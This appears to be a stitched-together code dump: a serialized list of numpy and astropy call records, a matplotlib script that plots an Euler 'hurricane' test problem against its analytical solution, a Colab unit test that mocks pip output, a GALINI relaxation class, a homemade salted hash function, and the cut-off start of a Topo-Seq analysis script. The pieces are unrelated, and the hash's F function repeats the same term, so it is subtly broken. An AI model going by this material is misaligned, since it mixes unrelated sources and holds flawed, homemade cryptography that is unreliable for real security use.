'np.expand_dims', (['pqr'], {'axis': '(1)'}), '(pqr, axis=1)\n', (4864, 4877), True, 'import numpy as np\n'), ((8122, 8153), 'numpy.cos', 'np.cos', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8128, 8153), True, 'import numpy as np\n'), ((8154, 8185), 'numpy.sin', 'np.sin', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8160, 8185), True, 'import numpy as np\n'), ((8603, 
8634), 'numpy.cos', 'np.cos', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8609, 8634), True, 'import numpy as np\n'), ((8635, 8666), 'numpy.sin', 'np.sin', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8641, 8666), True, 'import numpy as np\n'), ((9536, 9568), 'numpy.cos', 'np.cos', (['(-self.position_angle.rad)'], {}), '(-self.position_angle.rad)\n', (9542, 9568), True, 'import numpy as np\n'), ((9569, 9601), 'numpy.sin', 'np.sin', (['(-self.position_angle.rad)'], {}), '(-self.position_angle.rad)\n', (9575, 9601), True, 'import numpy as np\n'), ((12900, 12934), 'numpy.array', 'np.array', (['fp.boundary.coords[0:-1]'], {}), '(fp.boundary.coords[0:-1])\n', (12908, 12934), True, 'import numpy as np\n'), ((12946, 12986), 'numpy.tile', 'np.tile', (['[l0.deg, b0.deg]', 'edge.shape[0]'], {}), '([l0.deg, b0.deg], edge.shape[0])\n', (12953, 12986), True, 'import numpy as np\n'), ((13025, 13048), 'scipy.optimize.least_squares', 'least_squares', (['func', 'p0'], {}), '(func, p0)\n', (13038, 13048), False, 'from scipy.optimize import least_squares\n'), ((13095, 13173), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['(pos[:, 0] * u.deg)', '(pos[:, 1] * u.deg)'], {'frame': 'self.pointing.frame.name'}), '(pos[:, 0] * u.deg, pos[:, 1] * u.deg, frame=self.pointing.frame.name)\n', (13103, 13173), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((14161, 14196), 'numpy.array', 'np.array', (['footprint.boundary.coords'], {}), '(footprint.boundary.coords)\n', (14169, 14196), True, 'import numpy as np\n'), ((14935, 14962), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (14945, 14962), True, 'import matplotlib.pyplot as plt\n'), ((15041, 15113), 'descartes.patch.PolygonPatch', 'PolygonPatch', (['self.optics.valid_region'], {'color': '(0.8, 0.8, 0.8)', 'alpha': '(0.2)'}), '(self.optics.valid_region, color=(0.8, 0.8, 0.8), alpha=0.2)\n', (15053, 15113), False, 'from descartes.patch import PolygonPatch\n'), ((4887, 4950), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['pqr.T'], {'obstime': 'epoch', 'representation_type': '"""cartesian"""'}), "(pqr.T, obstime=epoch, representation_type='cartesian')\n", (4895, 4950), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((12553, 12608), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['pos[:, 0]', 'pos[:, 1]'], {'frame': 'frame', 'unit': 'u.deg'}), '(pos[:, 0], pos[:, 1], frame=frame, unit=u.deg)\n', (12561, 12608), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((13421, 13449), 'descartes.patch.PolygonPatch', 'PolygonPatch', (['pos'], {}), '(pos, **options)\n', (13433, 13449), False, 'from descartes.patch import PolygonPatch\n'), ((13267, 13299), 'numpy.stack', 'np.stack', (['[sky.l.deg, sky.b.deg]'], {}), '([sky.l.deg, sky.b.deg])\n', (13275, 13299), True, 'import numpy as np\n'), ((13359, 13394), 'numpy.stack', 'np.stack', (['[sky.ra.deg, sky.dec.deg]'], {}), '([sky.ra.deg, sky.dec.deg])\n', (13367, 13394), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
#------------------------------------------------------------
# Programmer(s): <NAME> @ SMU
#------------------------------------------------------------
# Copyright (c) 2019, Southern Methodist University.
# All rights reserved.
# For details, see the LICENSE file.
#------------------------------------------------------------
# matplotlib-based plotting utility function for
# hurricane test problem in the yz-plane
# imports
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import matplotlib.pyplot as plt
from utilities_euler3D import *
# determine if running interactively
if __name__=="__main__":
showplots = False
else:
showplots = True
# set view for surface plots
elevation = 15
angle = 20
# set test constants
rho0 = 1.0
v0 = 10.0
Amp = 25.0
gamma = 2.0
yl = -1.0
yr = 1.0
zl = -1.0
zr = 1.0
# utility function to create analytical solution
def analytical_solution(t,ny,nz):
if (t == 0):
t = 1e-14
p0prime = Amp*gamma*rho0**(gamma-1.0)
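  # p0prime is presumably dp/drho of an equation of state p = Amp*rho**gamma, evaluated at rho = rho0.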
rthresh = 2.0*t*np.sqrt(p0prime)
rho = np.zeros((ny,nz), dtype=float)
my = np.zeros((ny,nz), dtype=float)
mz = np.zeros((ny,nz), dtype=float)
dy = (yr-yl)/ny
dz = (zr-zl)/nz
for j in range(nz):
for i in range(ny):
y = (i+0.5)*dy + yl
z = (j+0.5)*dz + zl
r = np.sqrt(y*y + z*z)
if (r == 0.0): # protect against division by zero
r = 1e-14
costheta = y/r
sintheta = z/r
if (r < rthresh):
rho[i,j] = r*r / (8*Amp*t*t)
my[i,j] = rho[i,j] * (y + z) / (2*t)
mz[i,j] = rho[i,j] * (z - y) / (2*t)
else:
rho[i,j] = rho0
my[i,j] = rho0 * ( 2*t*p0prime*costheta +
np.sqrt(2*p0prime)*np.sqrt(r*r-2*t*t*p0prime)*sintheta )/r
mz[i,j] = rho0 * ( 2*t*p0prime*sintheta -
np.sqrt(2*p0prime)*np.sqrt(r*r-2*t*t*p0prime)*costheta )/r
return [rho, my, mz]
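# Example (hypothetical grid): rho, my, mz = analytical_solution(0.25, 100, 100) returns three 100x100 arrays on the yz mesh.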
# load solution data
nx, ny, nz, nchem, nt, xgrid, ygrid, zgrid, tgrid, rho, mx, my, mz, et, chem = load_data()
# output general information to screen
print('Generating plots for data set:')
print(' ny: ', ny)
print(' nz: ', nz)
print(' nt: ', nt)
# determine extents of plots
minmaxrho = [0.9*rho.min(), 1.1*rho.max()]
if (rho.min() == rho.max()):
minmaxrho = [rho.min()-0.1, rho.max()+0.1]
minmaxmy = [0.9*my.min(), 1.1*my.max()]
if (my.min() == my.max()):
minmaxmy = [my.min()-0.1, my.max()+0.1]
minmaxmz = [0.9*mz.min(), 1.1*mz.max()]
if (mz.min() == mz.max()):
minmaxmz = [mz.min()-0.1, mz.max()+0.1]
minmaxet = [0.9*et.min(), 1.1*et.max()]
if (et.min() == et.max()):
minmaxet = [et.min()-0.1, et.max()+0.1]
# generate plots of solution
for tstep in range(nt):
numfigs = 0
print('time step', tstep+1, 'out of', nt)
# get true solutions
rhotrue, mytrue, mztrue = analytical_solution(tgrid[tstep],ny,nz)
# set string constants for current time, mesh sizes
tstr = repr(tstep)
nystr = repr(ny)
nzstr = repr(nz)
# extract 2D velocity fields (computed and true)
U = my[nx//2,:,:,tstep]/rho[nx//2,:,:,tstep]
Utrue = mytrue/rhotrue
V = mz[nx//2,:,:,tstep]/rho[nx//2,:,:,tstep]
Vtrue = mztrue/rhotrue
speed = np.sqrt(U**2 + V**2)
speedtrue = np.sqrt(Utrue**2 + Vtrue**2)
# set filenames for graphics
rhosurf = 'rho_surface.' + repr(tstep).zfill(4) + '.png'
etsurf = 'et_surface.' + repr(tstep).zfill(4) + '.png'
vstr = 'velocity.' + repr(tstep).zfill(4) + '.png'
rhocont = 'rho_contour.' + repr(tstep).zfill(4) + '.png'
etcont = 'et_contour.' + repr(tstep).zfill(4) + '.png'
rho1dout = 'rho1d.' + repr(tstep).zfill(4) + '.png'
my1dout = 'my1d.' + repr(tstep).zfill(4) + '.png'
  mz1dout = 'mz1d.' + repr(tstep).zfill(4) + '.png'
sp1dout = 'speed1d.' + repr(tstep).zfill(4) + '.png'
# set y and z meshgrid objects
Y,Z = np.meshgrid(ygrid,zgrid)
# surface plots
numfigs += 1
fig = plt.figure(numfigs)
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(Y, Z, rho[nx//2,:,:,tstep], rstride=1, cstride=1,
cmap=cm.jet, linewidth=0, antialiased=True, shade=True)
ax.set_xlabel('y'); ax.set_ylabel('z'); ax.set_zlim((minmaxrho[0], minmaxrho[1]))
ax.view_init(elevation,angle)
plt.title(r'$\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(rhosurf)
numfigs += 1
fig = plt.figure(numfigs)
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(Y, Z, et[nx//2,:,:,tstep], rstride=1, cstride=1,
cmap=cm.jet, linewidth=0, antialiased=True, shade=True)
ax.set_xlabel('y'); ax.set_ylabel('z'); ax.set_zlim((minmaxet[0], minmaxet[1]))
ax.view_init(elevation,angle)
plt.title(r'$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(etsurf)
# stream plots
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
lw = speed / speed.max()
ax1.streamplot(Y, Z, U, V, color='b', linewidth=lw)
ax1.set_xlabel('y'); ax1.set_ylabel('z'); ax1.set_aspect('equal')
ax2 = fig.add_subplot(122)
lw = speedtrue / speedtrue.max()
ax2.streamplot(Y, Z, Utrue, Vtrue, color='k', linewidth=lw)
ax2.set_xlabel('y'); ax2.set_ylabel('z'); ax2.set_aspect('equal')
plt.suptitle(r'$\mathbf{v}(y,z)$ (left) vs $\mathbf{v}_{true}(y,z)$ (right) at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(vstr)
# contour plots
# numfigs += 1
# fig = plt.figure(numfigs,figsize=(12,4))
# ax1 = fig.add_subplot(121)
# ax1.contourf(Y, Z, rho[nx//2,:,:,tstep])
# plt.colorbar(); ax1.set_xlabel('y'); ax1.set_ylabel('z'); ax1.set_axis('equal')
# ax2 = fig.add_subplot(122)
# ax2.contourf(Y, Z, rhotrue)
# ax2.colorbar(); ax2.set_xlabel('y'); ax2.set_ylabel('z'); ax2.set_axis('equal')
# plt.suptitle(r'$\rho(y,z)$ (left) vs $\rho_{true}(y,z)$ (right) at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
# plt.savefig(rhocont)
# numfigs += 1
# fig = plt.figure(numfigs)
# plt.contourf(Y, Z, et[nx//2,:,:,tstep])
# plt.colorbar(); plt.xlabel('y'); plt.ylabel('z'); plt.axis('equal')
# plt.title(r'$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
# plt.savefig(etcont)
# line/error plots
rho1d = rho[nx//2,:,nz//2,tstep]
my1d = my[nx//2,:,nz//2,tstep]
mz1d = mz[nx//2,:,nz//2,tstep]
sp1d = speed[:,nz//2]
rhotrue1d = rhotrue[:,nz//2]
mytrue1d = mytrue[:,nz//2]
mztrue1d = mztrue[:,nz//2]
sptrue1d = speedtrue[:,nz//2]
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,rho1d,'b--',ygrid,rhotrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$\rho(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(rho1d-rhotrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|\rho-\rho_{true}|$')
plt.suptitle(r'$\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(rho1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,my1d,'b--',ygrid,mytrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$m_y(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(my1d-mytrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|m_y-m_{y,true}|$')
plt.suptitle(r'$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(my1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,mz1d,'b--',ygrid,mztrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$m_z(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(mz1d-mztrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|m_z-m_{z,true}|$')
plt.suptitle(r'$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(mz1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,sp1d,'b--',ygrid,sptrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel('s(y)')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(sp1d-sptrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|s-s_{true}|$')
plt.suptitle(r'$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(sp1dout)
if (showplots):
plt.show()
for i in range(1,numfigs+1):
plt.figure(i), plt.close()
##### end of script #####
|
[
"matplotlib.pyplot.title",
"numpy.meshgrid",
"matplotlib.pyplot.show",
"numpy.abs",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.close",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.savefig",
"numpy.sqrt"
] |
[((1092, 1123), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1100, 1123), True, 'import numpy as np\n'), ((1131, 1162), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1139, 1162), True, 'import numpy as np\n'), ((1170, 1201), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1178, 1201), True, 'import numpy as np\n'), ((3275, 3299), 'numpy.sqrt', 'np.sqrt', (['(U ** 2 + V ** 2)'], {}), '(U ** 2 + V ** 2)\n', (3282, 3299), True, 'import numpy as np\n'), ((3312, 3344), 'numpy.sqrt', 'np.sqrt', (['(Utrue ** 2 + Vtrue ** 2)'], {}), '(Utrue ** 2 + Vtrue ** 2)\n', (3319, 3344), True, 'import numpy as np\n'), ((4001, 4026), 'numpy.meshgrid', 'np.meshgrid', (['ygrid', 'zgrid'], {}), '(ygrid, zgrid)\n', (4012, 4026), True, 'import numpy as np\n'), ((4074, 4093), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {}), '(numfigs)\n', (4084, 4093), True, 'import matplotlib.pyplot as plt\n'), ((4412, 4491), 'matplotlib.pyplot.title', 'plt.title', (["('$\\\\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "('$\\\\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (4421, 4491), True, 'import matplotlib.pyplot as plt\n'), ((4496, 4516), 'matplotlib.pyplot.savefig', 'plt.savefig', (['rhosurf'], {}), '(rhosurf)\n', (4507, 4516), True, 'import matplotlib.pyplot as plt\n'), ((4545, 4564), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {}), '(numfigs)\n', (4555, 4564), True, 'import matplotlib.pyplot as plt\n'), ((4880, 4957), 'matplotlib.pyplot.title', 'plt.title', (["('$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "('$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (4889, 4957), True, 'import matplotlib.pyplot as plt\n'), ((4963, 4982), 'matplotlib.pyplot.savefig', 'plt.savefig', (['etsurf'], {}), '(etsurf)\n', (4974, 4982), True, 'import matplotlib.pyplot as plt\n'), ((5034, 5070), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (5044, 5070), True, 'import matplotlib.pyplot as plt\n'), ((5461, 5603), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["(\n '$\\\\mathbf{v}(y,z)$ (left) vs $\\\\mathbf{v}_{true}(y,z)$ (right) at output '\n + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "(\n '$\\\\mathbf{v}(y,z)$ (left) vs $\\\\mathbf{v}_{true}(y,z)$ (right) at output '\n + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (5473, 5603), True, 'import matplotlib.pyplot as plt\n'), ((5597, 5614), 'matplotlib.pyplot.savefig', 'plt.savefig', (['vstr'], {}), '(vstr)\n', (5608, 5614), True, 'import matplotlib.pyplot as plt\n'), ((6804, 6840), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (6814, 6840), True, 'import matplotlib.pyplot as plt\n'), ((7173, 7249), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$\\\\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$\\\\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (7185, 7249), True, 'import matplotlib.pyplot as plt\n'), ((7254, 7275), 'matplotlib.pyplot.savefig', 'plt.savefig', (['rho1dout'], {}), '(rho1dout)\n', (7265, 7275), True, 'import matplotlib.pyplot as plt\n'), ((7308, 7344), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (7318, 7344), True, 'import matplotlib.pyplot as plt\n'), ((7670, 
7744), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (7682, 7744), True, 'import matplotlib.pyplot as plt\n'), ((7750, 7770), 'matplotlib.pyplot.savefig', 'plt.savefig', (['my1dout'], {}), '(my1dout)\n', (7761, 7770), True, 'import matplotlib.pyplot as plt\n'), ((7803, 7839), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (7813, 7839), True, 'import matplotlib.pyplot as plt\n'), ((8165, 8239), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (8177, 8239), True, 'import matplotlib.pyplot as plt\n'), ((8245, 8265), 'matplotlib.pyplot.savefig', 'plt.savefig', (['mz1dout'], {}), '(mz1dout)\n', (8256, 8265), True, 'import matplotlib.pyplot as plt\n'), ((8294, 8330), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (8304, 8330), True, 'import matplotlib.pyplot as plt\n'), ((8647, 8719), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (8659, 8719), True, 'import matplotlib.pyplot as plt\n'), ((8725, 8745), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sp1dout'], {}), '(sp1dout)\n', (8736, 8745), True, 'import matplotlib.pyplot as plt\n'), ((1067, 1083), 'numpy.sqrt', 'np.sqrt', (['p0prime'], {}), '(p0prime)\n', (1074, 1083), True, 'import numpy as np\n'), ((8777, 8787), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8785, 8787), True, 'import matplotlib.pyplot as plt\n'), ((1347, 1369), 'numpy.sqrt', 'np.sqrt', (['(y * y + z * z)'], {}), '(y * y + z * z)\n', (1354, 1369), True, 'import numpy as np\n'), ((7073, 7098), 'numpy.abs', 'np.abs', (['(rho1d - rhotrue1d)'], {}), '(rho1d - rhotrue1d)\n', (7079, 7098), True, 'import numpy as np\n'), ((7574, 7597), 'numpy.abs', 'np.abs', (['(my1d - mytrue1d)'], {}), '(my1d - mytrue1d)\n', (7580, 7597), True, 'import numpy as np\n'), ((8069, 8092), 'numpy.abs', 'np.abs', (['(mz1d - mztrue1d)'], {}), '(mz1d - mztrue1d)\n', (8075, 8092), True, 'import numpy as np\n'), ((8555, 8578), 'numpy.abs', 'np.abs', (['(sp1d - sptrue1d)'], {}), '(sp1d - sptrue1d)\n', (8561, 8578), True, 'import numpy as np\n'), ((8827, 8840), 'matplotlib.pyplot.figure', 'plt.figure', (['i'], {}), '(i)\n', (8837, 8840), True, 'import matplotlib.pyplot as plt\n'), ((8842, 8853), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8851, 8853), True, 'import matplotlib.pyplot as plt\n'), ((1749, 1769), 'numpy.sqrt', 'np.sqrt', (['(2 * p0prime)'], {}), '(2 * p0prime)\n', (1756, 1769), True, 'import numpy as np\n'), ((1768, 1804), 'numpy.sqrt', 'np.sqrt', (['(r * r - 2 * t * t * p0prime)'], {}), '(r * r - 2 * t * t * p0prime)\n', (1775, 1804), True, 'import numpy as np\n'), ((1885, 1905), 'numpy.sqrt', 'np.sqrt', (['(2 * p0prime)'], {}), '(2 * p0prime)\n', (1892, 1905), True, 'import numpy as np\n'), ((1904, 1940), 'numpy.sqrt', 'np.sqrt', (['(r * r - 2 * t * t * p0prime)'], {}), '(r * r - 2 * t * t * p0prime)\n', (1911, 1940), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the google.colab._installation_commands package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import IPython
from IPython.utils import io
from google.colab import load_ipython_extension
MOCKED_COMMANDS = {
'pip install pandas':
"""
Requirement already satisfied: pandas in /usr/local/lib/python2.7/dist-packages (0.22.0)
Requirement already satisfied: pytz>=2011k in /usr/local/lib/python2.7/dist-packages (from pandas) (2018.9)
Requirement already satisfied: python-dateutil in /usr/local/lib/python2.7/dist-packages (from pandas) (2.5.3)
Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (1.16.2)
Requirement already satisfied: six>=1.5 in /usr/local/lib/python2.7/dist-packages (from python-dateutil->pandas) (1.11.0)
""",
'pip install -U numpy':
"""
Collecting numpy
Downloading https://files.pythonhosted.org/packages/c4/33/8ec8dcdb4ede5d453047bbdbd01916dbaccdb63e98bba60989718f5f0876/numpy-1.16.2-cp27-cp27mu-manylinux1_x86_64.whl (17.0MB)
100% |============================| 17.0MB 660kB/s
fastai 0.7.0 has requirement torch<0.4, but you'll have torch 1.0.1.post2 which is incompatible.
albumentations 0.1.12 has requirement imgaug<0.2.7,>=0.2.5, but you'll have imgaug 0.2.8 which is incompatible.
featuretools 0.4.1 has requirement pandas>=0.23.0, but you'll have pandas 0.22.0 which is incompatible.
Installing collected packages: numpy
Found existing installation: numpy 1.14.6
Uninstalling numpy-1.14.6:
Successfully uninstalled numpy-1.14.6
Successfully installed numpy-1.16.2
"""
}
class MockInteractiveShell(IPython.InteractiveShell):
"""Interactive shell that mocks some commands."""
def system(self, cmd):
if cmd in MOCKED_COMMANDS:
sys.stderr.write('')
sys.stdout.write(MOCKED_COMMANDS[cmd])
self.user_ns['_exit_code'] = 0
else:
return super(MockInteractiveShell, self).system(cmd)
class InstallationCommandsTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(InstallationCommandsTest, cls).setUpClass()
cls.ip = MockInteractiveShell()
load_ipython_extension(cls.ip)
def testPipMagicPandas(self):
output = self.run_cell('%pip install pandas')
self.assertEqual([], output.outputs)
self.assertEqual('', output.stderr)
self.assertIn('pandas', output.stdout)
def testPipMagicNumpy(self):
output = self.run_cell('%pip install -U numpy')
self.assertEqual([], output.outputs)
self.assertEqual('', output.stderr)
self.assertIn('numpy', output.stdout)
def run_cell(self, cell_contents):
with io.capture_output() as captured:
self.ip.run_cell(cell_contents)
return captured
|
[
"sys.stdout.write",
"sys.stderr.write",
"IPython.utils.io.capture_output",
"google.colab.load_ipython_extension"
] |
[((2828, 2858), 'google.colab.load_ipython_extension', 'load_ipython_extension', (['cls.ip'], {}), '(cls.ip)\n', (2850, 2858), False, 'from google.colab import load_ipython_extension\n'), ((2470, 2490), 'sys.stderr.write', 'sys.stderr.write', (['""""""'], {}), "('')\n", (2486, 2490), False, 'import sys\n'), ((2497, 2535), 'sys.stdout.write', 'sys.stdout.write', (['MOCKED_COMMANDS[cmd]'], {}), '(MOCKED_COMMANDS[cmd])\n', (2513, 2535), False, 'import sys\n'), ((3320, 3339), 'IPython.utils.io.capture_output', 'io.capture_output', ([], {}), '()\n', (3337, 3339), False, 'from IPython.utils import io\n')]
|
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A relaxation that removes integrality constraints on variables."""
from galini.core import Variable, Domain
from galini.relaxations.relaxation import Relaxation, RelaxationResult
class ContinuousRelaxation(Relaxation):
def relaxed_problem_name(self, problem):
return problem.name + '_continuous'
def relax_variable(self, problem, variable):
return Variable(
variable.name,
problem.lower_bound(variable),
problem.upper_bound(variable),
Domain.REAL,
)
def relax_objective(self, problem, objective):
return RelaxationResult(objective)
def relax_constraint(self, problem, constraint):
return RelaxationResult(constraint)
|
[
"galini.relaxations.relaxation.RelaxationResult"
] |
[((1175, 1202), 'galini.relaxations.relaxation.RelaxationResult', 'RelaxationResult', (['objective'], {}), '(objective)\n', (1191, 1202), False, 'from galini.relaxations.relaxation import Relaxation, RelaxationResult\n'), ((1272, 1300), 'galini.relaxations.relaxation.RelaxationResult', 'RelaxationResult', (['constraint'], {}), '(constraint)\n', (1288, 1300), False, 'from galini.relaxations.relaxation import Relaxation, RelaxationResult\n')]
|
from math import sin
from wsgi import HASH_SALT
def calculate_hash(data: str) -> str:
return _calculate_inner(HASH_SALT + data)
def _calculate_inner(data: str) -> str:
A = 0x12345678
B = 0x9ABCDEF0
C = 0xDEADDEAD
D = 0xC0FEC0FE
E = 0xFEEDBEAF
X = [int(0xFFFFFFFF * sin(i)) & 0xFFFFFFFF for i in range(256)]
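    # 256-entry constant table derived from sin(i), in the spirit of MD5's T table.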
def F(X, Y, Z):
return ((~X & Z) | (~X & Z)) & 0xFFFFFFFF
def G(X, Y, Z):
return ((X & Z) | (~Z & Y)) & 0xFFFFFFFF
def H(X, Y, Z):
return (X ^ Y ^ Z) & 0xFFFFFFFF
def I(X, Y, Z):
return (Y ^ (~Z | X)) & 0xFFFFFFFF
def ROL(X, Y):
return (X << Y | X >> (32 - Y)) & 0xFFFFFFFF
for i, ch in enumerate(data):
k, l = ord(ch), i & 0x1f
A = (B + ROL(A + F(B, C, D) + X[k], l)) & 0xFFFFFFFF
B = (C + ROL(B + G(C, D, E) + X[k], l)) & 0xFFFFFFFF
C = (D + ROL(C + H(E, A, B) + X[k], l)) & 0xFFFFFFFF
D = (E + ROL(D + I(C, D, E) + X[k], l)) & 0xFFFFFFFF
E = (A + ROL(E + F(A, B, C) + X[k], l)) & 0xFFFFFFFF
return "".join([hex(x)[2:].zfill(8) for x in [A, B, C, D, E]])
|
[
"math.sin"
] |
[((297, 303), 'math.sin', 'sin', (['i'], {}), '(i)\n', (300, 303), False, 'from math import sin\n')]
|
###############################################
##<NAME>, 2018##
##Topo-Seq analysis##
#The script takes raw GCSs data, returns only trusted GCSs,
#computes GCSs shared between different conditions,
#draws Venn diagrams of the sets overlappings,
#writes GCSs sets.
###############################################
#######
#Packages to be imported.
#######
import os
import matplotlib.pyplot as plt
import collections
from matplotlib_venn import venn2, venn3, venn3_circles
import numpy as np
#######
#Variables to be defined.
#######
print('Variables to be defined:')
#Path to the working directory
pwd="C:\\Users\sutor\OneDrive\ThinkPad_working\Sutor\Science\TopoI-ChIP-Seq\TopA_ChIP-Seq\EcTopoI_G116S_M320V_Topo-Seq\TCS_motifs\\"
#Input data
path_to_replicas={'TopoI_Topo_Seq_1': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_1_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_1_no_Ara_TCSs_called_thr_15.BroadPeak"},
'TopoI_Topo_Seq_2': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_2_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_2_no_Ara_TCSs_called_thr_15.BroadPeak"},
